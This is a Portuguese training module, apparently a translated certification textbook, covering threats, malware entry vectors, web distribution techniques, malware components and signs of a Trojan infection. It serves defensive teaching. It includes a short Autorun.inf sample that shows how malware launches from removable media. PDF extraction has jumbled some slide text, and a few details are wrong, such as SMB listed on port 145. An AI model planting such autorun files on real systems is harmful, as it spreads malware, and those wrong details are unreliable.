8 Noções básicas sobre ferramentas de avaliação de vulnerabilidade e exploração de vulnerabilidade
Tendências recentes em violações de segurança cibernética mostram que nenhum sistema ou rede está imune a
ataques. Todas as organizações que armazenam, transmitem e lidam com dados precisam aplicar fortes mecanismos
de segurança para monitorar continuamente seu ambiente de TI a fim de identificar as vulnerabilidades e resolvê-
las antes da exploração. É importante entender a diferença entre uma ameaça à segurança e uma vulnerabilidade.
Ameaças de segurança são incidentes que impactam negativamente a infraestrutura de TI da organização, enquanto
vulnerabilidades são lacunas ou falhas de segurança em um sistema ou rede que tornam as ameaças possíveis,
tentando os hackers a explorá-las.
Este módulo começa com uma introdução às ameaças e fontes de ameaças. Ele fornece informações sobre malware
e seus tipos. Posteriormente, o módulo discute vulnerabilidades e termina com uma breve discussão sobre os tipos
de avaliação de vulnerabilidade e ferramentas de avaliação de vulnerabilidade.
ÿ Explicar a ameaça e as fontes de ameaça
ÿ Compreender malware e componentes de malware
ÿ Descrever as técnicas comuns que os invasores usam para distribuir malware na web
ÿ Descrever diferentes tipos de malware e contramedidas de malware
ÿ Explicar a vulnerabilidade e classificação de vulnerabilidade
ÿ Compreender a pesquisa de vulnerabilidade
ÿ Compreender a avaliação de vulnerabilidade e os tipos de avaliação de vulnerabilidade
ÿ Explicar os sistemas de pontuação de vulnerabilidade e o ciclo de vida do gerenciamento de vulnerabilidade
ÿ Conhecer as ferramentas de avaliação de vulnerabilidade e exploração de vulnerabilidade


Fluxo do módulo
1 2
Definir Ameaça e Definir malware
Fontes de ameaças e seus tipos
3 4
Definir Definir vulnerabilidade
Vulnerabilidades Avaliação
Definir ameaças e fontes de ameaças
Os profissionais de segurança precisam entender a ameaça e as fontes de ameaça para enfrentar e lidar facilmente com
as ameaças em evolução, seus TTPs e atores. Esta seção discute a ameaça e a ameaça
origens.


O que é uma Ameaça?
ÿ Uma ameaça é a ocorrência potencial de um

evento indesejável que pode eventualmente
danificar e interromper as atividades
operacionais e funcionais de uma organização
ÿ Os invasores usam ameaças cibernéticas para

se infiltrar e roubar dados , como informações
pessoais de indivíduos, informações financeiras
e credenciais de login
O que é uma Ameaça?
Uma ameaça é a ocorrência potencial de um evento indesejável que pode eventualmente danificar e interromper as atividades
operacionais e funcionais de uma organização. Uma ameaça pode ser qualquer tipo de entidade ou ação executada em ativos
físicos ou intangíveis que possam interromper a segurança. A existência de ameaças pode ser acidental, intencional ou devido
ao impacto de outra ação.
Os invasores usam ameaças cibernéticas para se infiltrar e roubar dados, como informações pessoais, informações financeiras
e credenciais de login. Eles também podem usar um sistema comprometido para realizar atividades maliciosas e lançar novos
ataques. A criticidade de uma ameaça é baseada em quanto dano ela pode causar, quão incontrolável ela é ou no nível de
complexidade na identificação antecipada do último incidente de ameaça descoberto. Ameaças aos ativos de dados causam
perda de confidencialidade, integridade ou disponibilidade (CIA) dos dados. Eles também resultam em perda de dados, roubo
de identidade, sabotagem cibernética e divulgação de informações.
Exemplos de Ameaças
ÿ Um invasor roubando dados confidenciais de uma organização
ÿ Um invasor causando o desligamento de um servidor
ÿ Um invasor enganando um funcionário para revelar informações confidenciais
ÿ Um invasor infectando um sistema com malware
ÿ Um invasor falsificando a identidade de uma pessoa autorizada para obter acesso
ÿ Um invasor modificando ou adulterando os dados transferidos por uma rede
ÿ Um invasor alterando remotamente os dados em um servidor de banco de dados
ÿ Um invasor realizando redirecionamento de URL ou encaminhamento de URL


ÿ Um invasor realizando escalonamento de privilégios para acesso não autorizado
ÿ Um invasor executando ataques de negação de serviço (DoS) para tornar os recursos indisponíveis
ÿ Um invasor espionando um canal de comunicação sem acesso autorizado


Fontes de ameaças
Fontes de ameaças
Natural Não intencional Intencional
• Incêndios • Administradores
não qualificados
• Inundações
• Acidentes
• Falhas de energia interno Externo
• Funcionários preguiçosos
• Funcionário demitido • Hackers
ou destreinados
• Funcionário • Criminosos
descontente • Terroristas
• Provedores de serviço
• Agentes de inteligência
• Empreiteiros estrangeiros
• invasores corporativos
Fontes de ameaças
A seguir estão as várias fontes das quais as ameaças se originam. Eles podem ser amplamente classificados como
ameaças naturais, ameaças não intencionais e ameaças intencionais.
Figura 3.1: Classificação das fontes de ameaças
ÿ Ameaças Naturais
Fatores naturais como incêndios, inundações, falhas de energia, raios, meteoros e terremotos são ameaças
potenciais aos ativos de uma organização. Por exemplo, eles podem causar danos físicos graves aos
sistemas de computador.

ÿ Ameaças Involuntárias
Ameaças não intencionais são ameaças que existem devido ao potencial de ocorrência de erros não
intencionais dentro da organização. Os exemplos incluem violações de segurança internas, negligência, erros
do operador, administradores não qualificados, funcionários preguiçosos ou não treinados e acidentes.
ÿ Ameaças Intencionais
Existem duas fontes de ameaças intencionais.
o Ameaças Internas
A maioria dos crimes de computador e relacionados à Internet são internos ou ataques internos. Essas
ameaças são executadas por pessoas de dentro da organização, como funcionários descontentes ou
negligentes, e prejudicam a organização intencionalmente ou não.
A maioria desses ataques é realizada por usuários privilegiados da rede.
As causas dos ataques internos podem ser vingança, desrespeito, frustração ou falta de conscientização
sobre segurança. Os ataques internos são mais perigosos do que os ataques externos porque os internos
estão familiarizados com a arquitetura de rede, as políticas de segurança e os regulamentos da
organização. Além disso, as medidas e soluções de segurança geralmente se concentram mais em
ataques externos, levando potencialmente uma organização a ficar subequipada para identificar e
combater ataques internos.
o Ameaças Externas
Ataques externos são realizados explorando vulnerabilidades já existentes em uma rede, sem o auxílio
de funcionários internos. Portanto, o potencial para realizar um ataque externo depende da gravidade dos
pontos fracos da rede identificados. Os invasores podem realizar esses ataques para obter ganhos
financeiros, prejudicar a reputação da organização-alvo ou simplesmente por curiosidade. Os atacantes
externos podem ser indivíduos com experiência em técnicas de ataque ou um grupo de pessoas que
trabalham em conjunto com um motivo comum. Por exemplo, ataques podem ser realizados com o
objetivo de apoiar uma causa, por empresas concorrentes para espionagem corporativa e por países para
vigilância. Os invasores que realizam ataques externos têm um plano predefinido e usam ferramentas e
técnicas especializadas para penetrar nas redes com sucesso. Ataques externos podem incluir ataques
baseados em aplicativos e vírus, ataques baseados em senha, ataques baseados em mensagens
instantâneas, ataques baseados em tráfego de rede e ataques baseados em sistema operacional (SO).
As ameaças externas são ainda classificadas em dois tipos.
• Ameaças externas estruturadas
Ameaças externas estruturadas são implementadas por atacantes tecnicamente qualificados, usando
várias ferramentas para obter acesso a uma rede, com o objetivo de interromper os serviços. A
motivação por trás de tais ataques inclui subornos criminosos, racismo, política, terrorismo, etc. Os
exemplos incluem inundações de ICMP distribuídas, falsificação e execução simultânea de ataques
de várias fontes. Rastrear e identificar um invasor executando tal ataque pode ser um desafio.

• Ameaças externas não estruturadas
Ameaças externas não estruturadas são implementadas por invasores não qualificados, geralmente
script kiddies que podem ser aspirantes a hackers, para acessar redes. A maioria desses ataques é
realizada principalmente por curiosidade, e não com intenções criminosas. Por exemplo, invasores
não treinados usam ferramentas on-line disponíveis gratuitamente para tentar um ataque de rede ou
para derrubar um site ou outros domínios públicos na Internet. Ameaças externas não estruturadas
podem ser facilmente evitadas com a adoção de soluções de segurança, como varredura de portas
e ferramentas de varredura de endereço.

Fluxo do módulo
1 2
3 4
Definir malware e seus tipos

Para entender os vários tipos de malware e seu impacto na rede e nos recursos do sistema,
começaremos com uma discussão dos conceitos básicos de malware. Esta seção descreve
malware, tipos de malware e destaca as técnicas comuns usadas por invasores para distribuir
malware na web.

Introdução ao malware
ÿ Malware é um software malicioso que danifica ou

desabilita os sistemas de computador e dá
controle limitado ou total dos sistemas ao criador
do malware para fins de roubo ou fraude
Os programadores de malware desenvolvem e usam

malware para:
Atacar navegadores e rastrear sites visitados
Desacelerar os sistemas e degradar o

desempenho do sistema
Causa falha de hardware, tornando os computadores

inoperáveis
Roubar informações pessoais, incluindo contatos
Introdução ao malware
Malware é um software mal-intencionado que danifica ou desabilita sistemas de computador e dá controle limitado ou total dos
sistemas ao criador do malware para atividades maliciosas, como roubo ou fraude.
Malware inclui vírus, worms, trojans, rootkits, backdoors, botnets, ransomware, spyware, adware, scareware, crapware,
roughware, crypters, keyloggers, etc. Este software malicioso pode excluir arquivos, tornar computadores lentos, roubar
informações pessoais, enviar spam, ou cometer fraude. O malware pode executar várias atividades maliciosas, desde simples
publicidade por e-mail até roubo complexo de identidade e roubo de senha.
Os programadores de malware desenvolvem e usam malware para:
ÿ Atacar navegadores e rastrear sites visitados
ÿ Desacelerar os sistemas e degradar o desempenho do sistema
ÿ Causa falha de hardware, tornando os computadores inoperáveis
ÿ Roubar informações pessoais, incluindo contactos
ÿ Apague informações valiosas, resultando em perda substancial de dados
ÿ Atacar sistemas de computador adicionais diretamente de um sistema comprometido
ÿ Caixas de entrada de spam com e-mails publicitários

Diferentes maneiras de malware entrar em um sistema
Baixando arquivos do
1 Aplicativos de mensagens instantâneas 5
Internet
Mídia de hardware
2 6 anexos de e-mail
portátil/dispositivos removíveis
3 Bugs de software de navegador e e-mail 7 Instalação por outro malware
Sites não confiáveis e aplicativos/

4 8 Bluetooth e redes sem fio
software da web freeware
Diferentes maneiras de malware entrar em um sistema
ÿ Aplicativos de Mensageiro Instantâneo
A infecção pode ocorrer por meio de aplicativos de mensagens instantâneas, como Facebook
Messenger, WhatsApp Messenger, LinkedIn Messenger, Google Hangouts ou ICQ. Os usuários
correm alto risco ao receber arquivos por meio de mensagens instantâneas. Independentemente de
quem envia o arquivo ou de onde ele é enviado, sempre existe o risco de infecção por um Trojan. O
usuário nunca pode ter 100% de certeza de quem está do outro lado da conexão em um determinado
momento. Por exemplo, se você receber um arquivo por meio de um aplicativo de mensagens
instantâneas de uma pessoa conhecida como Bob, tentará abrir e visualizar o arquivo. Isso pode ser
um truque pelo qual um invasor que invadiu o ID e a senha do mensageiro de Bob deseja espalhar
cavalos de Tróia pela lista de contatos de Bob para capturar mais vítimas.
ÿ Mídia de Hardware Portátil/Dispositivos Removíveis
o A mídia de hardware portátil, como unidades flash, CDs/DVDs e discos rígidos externos, também
pode injetar malware em um sistema. Uma maneira simples de injetar malware no sistema de
destino é por meio do acesso físico. Por exemplo, se Bob puder acessar o sistema de Alice na
ausência dela, ele poderá instalar um Trojan copiando o software Trojan de sua unidade flash
para o disco rígido dela.
o Outro meio de infecção por malware de mídia portátil é por meio da função Autorun. Autorun,
também conhecido como Autoplay ou Autostart, é um recurso do Windows que, se ativado,
executa um programa executável quando um usuário insere um CD/DVD na bandeja de DVD-
ROM ou conecta um dispositivo USB. Os invasores podem explorar esse recurso para executar
malware junto com programas genuínos. Eles colocam um arquivo Autorun.inf com o malware
em um CD/DVD ou dispositivo USB e induzem as pessoas a inseri-lo ou conectá-lo

seus sistemas. Como muitas pessoas não estão cientes dos riscos envolvidos, suas máquinas são vulneráveis
ao malware Autorun. A seguir está o conteúdo de um arquivo Autorun.inf:
[execução automática]
open=setup.exe
icon=setup.exe
Para mitigar essa infecção, desative a funcionalidade Autostart. Siga as instruções abaixo para desativar a
reprodução automática no Windows 10:
1. Clique em Iniciar. Digite gpedit.msc na caixa Iniciar pesquisa e pressione ENTER.
2. Se for solicitada uma senha ou confirmação de administrador, digite a senha ou clique em Permitir.
3. Em Configuração do computador, expanda Modelos administrativos, expanda

Componentes do Windows e, em seguida, clique em Políticas de reprodução automática.
4. No painel Detalhes , clique duas vezes em Desativar reprodução automática.
5. Clique em Ativado e selecione Todas as unidades na caixa Desativar reprodução automática para desativar
Executar automaticamente em todas as unidades.
6. Reinicie o computador.
ÿ Bugs de software de navegador e e-mail
Navegadores desatualizados geralmente contêm vulnerabilidades que podem representar um grande risco para o
computador do usuário. Uma visita a um site malicioso de tais navegadores pode infectar automaticamente a
máquina sem baixar ou executar qualquer programa. O mesmo cenário ocorre durante a verificação de e-mail com
o Outlook Express ou algum outro software com problemas conhecidos. Novamente, ele pode infectar o sistema
do usuário mesmo sem baixar um anexo. Para reduzir esses riscos, sempre use a versão mais recente do
navegador e do software de e-mail.
ÿ Gerenciamento inseguro de patches
Software sem patch representa um alto risco. Os usuários e administradores de TI não atualizam seus aplicativos
de software com a frequência que deveriam, e muitos invasores se aproveitam desse fato bem conhecido. Os
invasores podem explorar o gerenciamento inseguro de patches injetando malware no software que pode danificar
os dados armazenados nos sistemas da empresa. Esse processo pode levar a extensas violações de segurança,
como roubo de arquivos confidenciais e credenciais da empresa. Alguns aplicativos considerados vulneráveis e
corrigidos recentemente incluem Google Play Core Library (CVE-2020-8913), Cloudflare WARP for Windows
(CVE-2020-35152), Oracle WebLogic Server (CVE-2020-14750) e Apache Tomcat (CVE-2021-24122). O
gerenciamento de patches deve ser eficaz na mitigação de ameaças e é vital aplicar patches e atualizar
regularmente os programas de software.

ÿ Aplicativos não autorizados/chamariz
Os invasores podem facilmente induzir a vítima a baixar aplicativos/programas gratuitos. Se um programa

gratuito afirma ser carregado com recursos como um catálogo de endereços, acesso a várias contas POP3 e
outras funções, muitos usuários ficarão tentados a experimentá-lo. POP3 (Post Office Protocol versão 3) é um
protocolo de transferência de e-mail.
o Se a vítima fizer o download de programas gratuitos e os rotular como CONFIÁVEIS, o software de proteção,
como o software antivírus, não indicará o uso de um novo software. Nessa situação, um invasor recebe um
e-mail, senhas de contas POP3, senhas em cache e pressionamentos de tecla por e-mail sem ser notado.
o Os atacantes prosperam na criatividade. Considere um exemplo no qual um invasor cria um site falso (digamos,
Audio galaxy) para baixar MP3s. Ele ou ela poderia gerar tal site usando 15 GB de espaço para os MP3s e
instalando quaisquer outros sistemas necessários para criar a ilusão de um site. Isso pode levar os usuários
a pensar que estão apenas baixando de outros usuários da rede. No entanto, o software pode atuar como
um backdoor e infectar milhares de usuários ingênuos.
o Alguns sites têm até links para software anti-Trojan, enganando assim os usuários para que confiem neles e
baixem freeware infectado. Incluído na configuração está um arquivo readme.txt que pode enganar quase
qualquer usuário. Portanto, qualquer site de freeware requer atenção adequada antes que qualquer software
seja baixado dele.
o Webmasters de portais de segurança conhecidos, que têm acesso a vastos arquivos contendo vários
programas de hackers, devem agir com responsabilidade em relação aos arquivos que fornecem e examiná-
los frequentemente com software antivírus e anti-Trojan para garantir que seu site esteja livre de Trojans e
vírus. Suponha que um invasor envie um programa infectado com um Trojan (por exemplo, um flooder UDP)
ao webmaster de um arquivo. Se o webmaster não estiver alerta, o invasor pode usar essa oportunidade
para infectar os arquivos do site com o Trojan. Os usuários que lidam com qualquer software ou aplicativo
da web devem verificar seus sistemas diariamente. Se eles detectarem algum novo arquivo, é essencial
examiná-lo. Caso surja alguma suspeita em relação ao arquivo, também é importante encaminhá-lo aos
laboratórios de detecção de software para análise posterior.
o É fácil infectar máquinas usando freeware; portanto, precauções extras são necessárias.
ÿ Sites não confiáveis e aplicativos/softwares da Web gratuitos
Um site pode ser suspeito se estiver localizado em um provedor de site gratuito ou que ofereça programas para
atividades ilegais.
o É altamente arriscado baixar programas ou ferramentas localizados em sites “subterrâneos”, por exemplo, o
software NeuroticKat, porque eles podem servir como um canal para um ataque de cavalo de Tróia em
computadores de destino. Os usuários devem avaliar o alto risco de visitar esses sites antes de navegar
neles.
o Muitos sites maliciosos têm uma aparência profissional, arquivos enormes, fóruns de comentários e links para
outros sites populares. Os usuários devem verificar os arquivos usando antivírus

software antes de baixá-los. Só porque um site parece profissional não significa que seja seguro.
o Sempre baixe software popular de seu site original (ou espelho oficialmente dedicado), e não de sites de
terceiros com links para o (supostamente) mesmo software.
ÿ Baixando Arquivos da Internet
Os cavalos de Tróia entram em um sistema quando os usuários baixam aplicativos da Internet, como
tocadores de música, arquivos, filmes, jogos, cartões comemorativos e protetores de tela de sites maliciosos,
pensando que são legítimos. As macros do Microsoft Word e do Excel também são usadas de forma eficaz
para transferir malware e os arquivos MS Word/Excel maliciosos baixados podem infectar os sistemas. O
malware também pode ser incorporado em arquivos de áudio/vídeo, bem como em arquivos de legenda de
vídeo.
ÿ Anexos de E-mail
Um anexo de um e-mail é o meio mais comum para transmitir malware. O anexo pode estar em qualquer
formato, e o invasor usa ideias inovadoras para induzir a vítima a clicar e baixar o anexo. O anexo pode ser
um documento, arquivo de áudio, arquivo de vídeo, folheto, fatura, carta de oferta de loteria, carta de oferta
de emprego, carta de aprovação de empréstimo, formulário de admissão, aprovação de contrato, etc.
Exemplo 1: O amigo de um usuário está realizando uma pesquisa e o usuário gostaria de saber mais sobre
o tópico de pesquisa do amigo. O usuário envia um e-mail para o amigo para perguntar sobre o assunto e
aguarda uma resposta. Um invasor visando o usuário também conhece o endereço de e-mail do amigo. O
invasor simplesmente codificará um programa para preencher falsamente o campo “De:” do e-mail e anexar
um cavalo de Tróia ao e-mail. O usuário verificará o e-mail e pensará que o amigo respondeu à consulta
em um anexo, fará o download do anexo e o executará sem pensar que pode ser um cavalo de Tróia,
resultando em uma infecção.
Alguns clientes de e-mail, como o Outlook Express, possuem bugs que executam arquivos anexados
automaticamente. Para evitar tais ataques, use serviços de e-mail seguros, investigue os cabeçalhos dos e-
mails com anexos, confirme o endereço de e-mail do remetente e baixe o anexo somente se o remetente
for legítimo.
ÿ Propagação de Rede
A segurança da rede é a primeira linha de defesa para proteger os sistemas de informação contra incidentes
de hackers. No entanto, vários fatores, como a substituição de firewalls de rede e erros de operadoras,
podem às vezes permitir tráfego de Internet não filtrado em redes privadas. Os operadores de malware
tentam continuamente conexões com endereços dentro do intervalo de endereços da Internet pertencentes
aos alvos para buscar uma oportunidade de acesso irrestrito. Alguns malwares se propagam através de
redes tecnológicas. Por exemplo, o Blaster inicia a partir do endereço IP de uma máquina local ou de um
endereço completamente aleatório e tenta infectar endereços IP sequenciais. Embora ataques de
propagação de rede que tiram proveito de vulnerabilidades em protocolos de rede comuns (por exemplo,
SQL Slammer) não tenham prevalecido recentemente, o potencial para tais ataques ainda existe.

ÿ Serviços de Compartilhamento de Arquivos
Se NetBIOS (porta 139), FTP (porta 21), SMB (porta 145), etc., em um sistema estiverem abertos para
compartilhamento de arquivos ou execução remota, eles poderão ser usados por outras pessoas para acessar o
sistema. Isso pode permitir que invasores instalem malware e modifiquem arquivos do sistema.
Os invasores também podem usar um ataque DoS para desligar o sistema e forçar uma reinicialização para que o
Trojan possa se reiniciar imediatamente. Para evitar tais ataques, certifique-se de que a propriedade de
compartilhamento de arquivos esteja desativada. Para desativar a opção de compartilhamento de arquivos no
Windows, clique em Iniciar e digite Painel de controle. Em seguida, nos resultados, clique na opção Painel de
controle e navegue até Rede e Internet ÿ Centro de rede e compartilhamento ÿ Alterar configurações avançadas
de compartilhamento. Selecione um perfil de rede e, na seção Compartilhamento de arquivos e impressoras ,
selecione Desativar compartilhamento de arquivos e impressoras. Isso evitará o abuso de compartilhamento de arquivos.
ÿ Instalação por outro Malware
Um malware que pode comandar e controlar geralmente será capaz de se reconectar ao site do operador do malware
usando protocolos de navegação comuns. Essa funcionalidade permite que o malware na rede interna receba
software e comandos externos. Nesses casos, o malware instalado em um sistema leva à instalação de outro
malware na rede, causando danos à rede.
ÿ Bluetooth e redes sem fio
Os invasores usam redes Bluetooth e Wi-Fi abertas para atrair usuários para se conectar a eles.
Essas redes abertas têm dispositivos de software e hardware instalados no nível do roteador para capturar o tráfego
de rede e pacotes de dados, bem como para encontrar os detalhes da conta dos usuários, incluindo nomes de usuário
e senhas.

Técnicas comuns que os invasores usam para distribuir

Malware na Web
Mecanismo de busca de chapéu preto
Classificando páginas de malware altamente nos resultados de pesquisa
Otimização (SEO)
Engenharia social
Enganar os usuários para que cliquem em páginas da Web de aparência inocente
roubo de cliques
Sites de phishing Imitar instituições legítimas na tentativa de roubar credenciais de login
Incorporação de malware em redes de anúncios exibidas em centenas de sites legítimos de alto

Malvertising
tráfego
comprometido
Hospedagem de malware incorporado que se espalha para visitantes desavisados
Sites legítimos
Explorar falhas no software do navegador para instalar malware apenas visitando uma
Transferências automáticas
página da web
Anexar o malware a e-mails e enganar as vítimas para que cliquem no anexo

E-mails de spam
Técnicas comuns que os invasores usam para distribuir malware na Web
Fonte: Relatório de ameaças à segurança (https:// www.sophos.com)
Algumas técnicas padrão usadas para distribuir malware na web são as seguintes:
ÿ Black hat Search Engine Optimization (SEO): Black hat SEO (também conhecido como SEO antiético) usa táticas
agressivas de SEO, como preenchimento de palavras-chave, inserção de páginas de entrada, troca de páginas e
adição de palavras-chave não relacionadas para obter classificações mais altas nos mecanismos de pesquisa
para páginas de malware .
ÿ Clickjacking de engenharia social: os invasores injetam malware em sites que parecem legítimos para induzir os
usuários a clicar neles. Quando clicado, o malware embutido no link é executado sem o conhecimento ou
consentimento do usuário.
ÿ Sites de Spear-phishing: Essa técnica é usada para imitar instituições legítimas, como bancos, para roubar senhas,
dados de cartões de crédito e contas bancárias e outras informações confidenciais.
ÿ Malvertising: Esta técnica envolve a incorporação de anúncios carregados de malware em canais legítimos de
publicidade online para espalhar malware em sistemas de usuários desavisados
usuários.
ÿ Sites legítimos comprometidos: frequentemente, os invasores usam sites comprometidos para infectar sistemas
com malware. Quando um usuário desavisado visita o site comprometido, ele instala o malware em seu sistema
sem saber, após o que o malware realiza atividades maliciosas.

ÿ Drive-by Downloads: Refere-se ao download não intencional de software através da

Internet. Aqui, um invasor explora falhas no software do navegador para instalar malware
simplesmente visitando um site.
ÿ E-mails de spam: o invasor anexa um arquivo malicioso a um e-mail e o envia para vários
endereços de destino. A vítima é induzida a clicar no anexo e assim executar o malware,
comprometendo sua máquina. Essa técnica é o método mais comum atualmente em uso
pelos invasores. Além dos anexos de e-mail, um invasor também pode usar o corpo do e-
mail para incorporar o malware.

Componentes de malware
ÿ Os componentes de um software de malware dependem dos requisitos do
autor de malware que o projeta para um alvo específico para executar tarefas pretendidas
Malware
Descrição
Componente
criptografar Software que protege o malware de passar por engenharia reversa ou análise
Downloader Um tipo de Trojan que baixa outro malware da Internet para o PC
conta-gotas Um tipo de Trojan que instala secretamente outros arquivos de malware no sistema
Um código malicioso que viola a segurança do sistema por meio de vulnerabilidades de software para acessar informações ou instalar malware
Explorar
Um programa que injeta seu código em outros processos em execução vulneráveis e altera a forma como eles são executados para ocultar ou
injetor
impedir sua remoção
Um programa que oculta seu código e a finalidade pretendida por meio de várias técnicas e, portanto, torna difícil para os mecanismos de segurança
Obfuscator
detectá-lo ou removê-lo
Um programa que permite que todos os arquivos sejam agrupados em um único arquivo executável por meio de compactação para ignorar a
embalador
detecção de software de segurança
Carga útil Um pedaço de software que permite o controle sobre um sistema de computador depois de ter sido explorado
Código malicioso Um comando que define as funcionalidades básicas do malware, como roubo de dados e criação de backdoors
Componentes de malware
Os autores e invasores de malware os criam usando componentes que podem ajudá-los a atingir seus objetivos. Eles
podem usar malware para roubar informações, excluir dados, alterar configurações do sistema, fornecer acesso ou
simplesmente multiplicar e ocupar espaço. O malware é capaz de se propagar e funcionar secretamente.
Certos componentes essenciais da maioria dos programas de malware são os seguintes:
ÿ Crypter: Este é um software que pode ocultar a existência de malware. Os invasores usam esse software para
iludir a detecção de antivírus. Ele protege o malware de engenharia reversa ou análise, dificultando sua
detecção por mecanismos de segurança.
ÿ Downloader: Este é um tipo de Trojan que baixa outro malware (ou) código malicioso e arquivos da Internet
para um PC ou dispositivo. Normalmente, os invasores instalam um downloader quando obtêm acesso a um
sistema pela primeira vez.
ÿ Dropper: Este é um portador oculto de malware. Os invasores incorporam arquivos de malware notórios dentro
de conta-gotas, que podem executar a tarefa de instalação secretamente. Os invasores precisam primeiro
instalar o programa de malware ou código no sistema para executar o conta-gotas. O conta-gotas pode
transportar código de malware e executar malware em um sistema de destino sem ser detectado por scanners
antivírus.
ÿ Exploit: É a parte do malware que contém um código ou uma sequência de comandos que pode tirar proveito
de um bug ou vulnerabilidade em um sistema ou dispositivo digital. Os invasores usam esse código para
violar a segurança do sistema por meio de vulnerabilidades de software para espionar informações ou instalar
malware. Com base no tipo de vulnerabilidade abusada, as explorações são categorizadas em explorações
locais e explorações remotas.

ÿ Injector: Este programa injeta exploits ou códigos maliciosos disponíveis no malware em outros processos
vulneráveis em execução e altera o método de execução para ocultar ou impedir sua remoção.
ÿ Obfuscator: É um programa que oculta o código malicioso do malware por meio de diversas técnicas,
dificultando assim a detecção ou remoção pelos mecanismos de segurança.
ÿ Packer: Este software comprime o arquivo de malware para converter o código e os dados do malware em
um formato ilegível. Ele usa técnicas de compactação para compactar o malware.
ÿ Payload: Esta é a parte do malware que executa a atividade desejada quando ativado. Ele pode ser usado
para excluir ou modificar arquivos, degradar o desempenho do sistema, abrir portas, alterar configurações
e assim por diante, para comprometer a segurança do sistema.
ÿ Código malicioso: Este é um pedaço de código que define a funcionalidade básica do malware e compreende
comandos que resultam em brechas de segurança. Pode assumir as seguintes formas:
o Java applets
o Controles ActiveX
o Plug-ins do navegador
o Conteúdo enviado

Tipos de malware
1 Cavalos de Tróia 6 APIs ou Grayware
2 vírus 7 Spyware
3 ransomware 8 Keylogger
4 Worms de computador 9 botnets
5 rootkits 10 Malware sem arquivo
Tipos de malware
Um malware é um software malicioso projetado para executar atividades pretendidas pelo invasor, sem o consentimento do
usuário. Isso pode estar na forma de código executável, conteúdo ativo, scripts ou outros tipos de software.
Listados abaixo estão vários tipos de malware:
ÿ Troianos
ÿ Vírus
ÿ Ransomware
ÿ Worms Informáticos
ÿ Rootkits
ÿ PUAs ou Grayware
ÿ Spyware
ÿ Keylogger
ÿ Botnets
ÿ Malware sem arquivo

O que é um cavalo de Tróia?
É um programa em que o código malicioso ou Os cavalos de Tróia são Os cavalos de Tróia

prejudicial está contido dentro de um programa ou ativados quando um usuário criam um canal de
dados aparentemente inofensivos, que posteriormente executa determinadas ações comunicação secreto entre o
podem assumir o controle e causar danos predefinidas computador da vítima e o invasor
para transferir dados confidenciais
Mudar?
Destruir? Transmite?
Transferências
Arquivos maliciosos
Atacante Internet
propaga Trojan
Arquivos maliciosos Vítima infectada com Trojan
Cavalos de Tróia
O que é um cavalo de Tróia?
Segundo a mitologia grega antiga, os gregos venceram a Guerra de Tróia com a ajuda de um gigantesco cavalo de madeira que
foi construído para esconder seus soldados. Os gregos deixaram este cavalo em frente aos portões de Tróia. Os troianos pensaram
que o cavalo era um presente dos gregos, que eles haviam deixado antes de aparentemente se retirarem da guerra e o trouxeram
para sua cidade. À noite, os soldados gregos saltaram do cavalo de madeira e abriram os portões da cidade para deixar entrar o
resto do exército grego, que acabou destruindo a cidade de Tróia.
Inspirado nessa história, um Trojan de computador é um programa no qual um código malicioso ou prejudicial está contido dentro
de um programa ou dados aparentemente inofensivos, que podem posteriormente assumir o controle e causar danos, como arruinar
a tabela de alocação de arquivos em seu disco rígido. Os invasores usam cavalos de Tróia de computador para induzir a vítima a
executar uma ação predefinida. Os cavalos de Tróia são ativados mediante ações predefinidas específicas dos usuários, como
instalar acidentalmente um software malicioso, clicar em um link malicioso etc. dano. Por exemplo, os usuários podem baixar um
arquivo que parece ser um filme, mas, ao ser executado, libera um programa perigoso que apaga o disco rígido ou envia números
de cartão de crédito e senhas ao invasor.
Um Trojan é incluído ou anexado a um programa legítimo, o que significa que o programa pode ter uma funcionalidade que não é
aparente para o usuário. Além disso, os invasores usam as vítimas como intermediários involuntários para atacar outras pessoas.
Eles podem usar o computador da vítima para cometer ataques DoS ilegais.

Os cavalos de Troia funcionam com o mesmo nível de privilégios que as vítimas. Por exemplo, se uma vítima tiver
privilégios para excluir arquivos, transmitir informações, modificar arquivos existentes e instalar outros programas
(como programas que fornecem acesso não autorizado à rede e executam ataques de elevação de privilégio), uma
vez que o cavalo de Tróia infecta esse sistema, ele possuirá o mesmos privilégios. Além disso, pode tentar explorar
vulnerabilidades para aumentar o nível de acesso mesmo além do usuário que o está executando. Se for bem-
sucedido, o Trojan pode usar esses privilégios aumentados para instalar outro código malicioso na máquina da
vítima.
Um sistema comprometido pode afetar outros sistemas na rede. Os sistemas que transmitem credenciais de
autenticação, como senhas em redes compartilhadas em texto não criptografado ou um formulário criptografado
trivialmente, são particularmente vulneráveis. Se um intruso comprometer um sistema em tal rede, ele poderá
gravar nomes de usuários e senhas ou outras informações confidenciais.
Além disso, um cavalo de Tróia, dependendo das ações que executa, pode falsamente implicar um sistema remoto
como a fonte de um ataque por falsificação, fazendo com que o sistema remoto incorra em responsabilidade. Os
cavalos de Tróia entram no sistema por meio de anexos de e-mail, downloads e
mensagens.
Figura 3.2: Representação de um ataque de Trojan

Indicações de ataque de Trojan
A tela do computador pisca, vira de

As configurações de cores do sistema
cabeça para baixo ou é invertida para que
operacional (SO) mudam automaticamente
tudo seja exibido ao contrário
As configurações padrão de plano

Os programas antivírus são
de fundo ou papel de parede
desativados automaticamente
mudam automaticamente
Páginas da Web abrem repentinamente Pop-ups com mensagens bizarras

sem entrada do usuário aparecem de repente
Indicações de ataque de Trojan
Os seguintes problemas de funcionamento do computador são indícios de um ataque de Trojan:
ÿ A gaveta do DVD-ROM abre e fecha automaticamente.
ÿ A tela do computador pisca, vira de cabeça para baixo ou é invertida para que tudo seja exibido ao contrário.
ÿ As configurações padrão de plano de fundo ou papel de parede mudam automaticamente. Isso pode ser feito usando
imagens no computador do usuário ou no programa do invasor.
ÿ As impressoras começam a imprimir documentos automaticamente.
ÿ As páginas da Web abrem repentinamente sem entrada do usuário.
ÿ As configurações de cores do sistema operacional (SO) mudam automaticamente.
ÿ Os protetores de tela são convertidos em uma mensagem de rolagem pessoal.
ÿ O volume do som flutua repentinamente.
ÿ Os programas antivírus são desativados automaticamente e os dados são corrompidos, alterados ou excluídos do sistema.
ÿ A data e a hora da alteração do computador.
ÿ O cursor do mouse se move sozinho.
ÿ As funções de clique esquerdo e direito do mouse são trocadas.
ÿ O ponteiro do mouse desaparece completamente.
ÿ O ponteiro do mouse clica automaticamente nos ícones e é incontrolável.

ÿ O botão Iniciar do Windows desaparece.
ÿ Pop-ups com mensagens bizarras aparecem de repente.
ÿ Imagens e texto da área de transferência parecem ser manipulados.
